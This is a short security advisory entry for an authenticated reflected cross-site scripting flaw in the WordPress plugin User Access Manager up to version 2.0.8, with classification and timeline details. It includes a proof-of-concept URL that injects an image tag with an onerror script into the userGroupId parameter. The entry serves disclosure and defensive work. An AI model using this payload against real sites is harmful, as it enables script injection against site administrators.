WordPress Plugin Vulnerabilities
User Access Manager <= 2.0.8 - Authenticated Reflected Cross-Site Scripting (XSS)
Description
The issue was not patched in 2.0.0, despite what the advisory states.
Proof of Concept
http://www.example.com/wp-admin/admin.php?page=uam_user_group&uam_action=edit_user_group&userGroupId=1%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E%3C%22
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Submitter
ethicalhack3r
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2017-05-11 (about 7 years ago)
Added
2017-05-12 (about 7 years ago)
Last Updated
2019-11-01 (about 4 years ago)